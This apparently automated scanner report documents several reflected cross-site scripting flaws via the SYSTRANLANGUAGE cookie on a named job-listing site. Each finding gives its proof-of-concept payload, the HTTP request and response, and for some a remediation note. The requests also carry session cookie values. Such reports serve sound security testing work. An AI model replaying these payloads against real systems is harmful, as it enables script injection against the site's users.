The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6398b"><img%20src%3da%20onerror%3dalert(1)>ba3c68b365f was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 6398b"><img src=a onerror=alert(1)>ba3c68b365f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/customization/Vermont/documents/eeoislaw.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en6398b"><img%20src%3da%20onerror%3dalert(1)>ba3c68b365f; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:34 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en6398b"><img src=a onerror=alert(1)>ba3c68b365f">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d0cc"%3balert(1)//58328ab40e9 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 3d0cc";alert(1)//58328ab40e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/customization/Vermont/documents/eeoislaw.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en3d0cc"%3balert(1)//58328ab40e9; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:43 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN3D0CC";ALERT(1)//58328AB40E9\">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acbaa"><img%20src%3da%20onerror%3dalert(1)>ae5b7c5d919 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as acbaa"><img src=a onerror=alert(1)>ae5b7c5d919 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/customization/Vermont/documents/privacy.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=enacbaa"><img%20src%3da%20onerror%3dalert(1)>ae5b7c5d919; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:31 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="enacbaa"><img src=a onerror=alert(1)>ae5b7c5d919">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d941"%3balert(1)//bf7542d8709 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 4d941";alert(1)//bf7542d8709 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/customization/Vermont/documents/privacy.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en4d941"%3balert(1)//bf7542d8709; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:39 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN4D941";ALERT(1)//BF7542D8709\">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a13a7"%3balert(1)//00ccd787efa was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as a13a7";alert(1)//00ccd787efa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/customization/Vermont/favicon.ico HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=ena13a7"%3balert(1)//00ccd787efa
Response (redirected)
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:16:59 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENA13A7";ALERT(1)//00CCD787EFA\">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73b71"><img%20src%3da%20onerror%3dalert(1)>4f618c7f396 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 73b71"><img src=a onerror=alert(1)>4f618c7f396 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/customization/Vermont/favicon.ico HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en73b71"><img%20src%3da%20onerror%3dalert(1)>4f618c7f396
Response (redirected)
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:16:46 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en73b71"><img src=a onerror=alert(1)>4f618c7f396">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8806"%3balert(1)//e2594ad7f76 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as b8806";alert(1)//e2594ad7f76 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/default.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=enb8806"%3balert(1)//e2594ad7f76; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:17 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENB8806";ALERT(1)//E2594AD7F76\">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60b78"><img%20src%3da%20onerror%3dalert(1)>26d42412b51 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 60b78"><img src=a onerror=alert(1)>26d42412b51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/default.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en60b78"><img%20src%3da%20onerror%3dalert(1)>26d42412b51; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:12 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en60b78"><img src=a onerror=alert(1)>26d42412b51">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e46b"%3balert(1)//47870d01fcb was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 7e46b";alert(1)//47870d01fcb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/etp/etp_newuser_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en7e46b"%3balert(1)//47870d01fcb; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:34 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
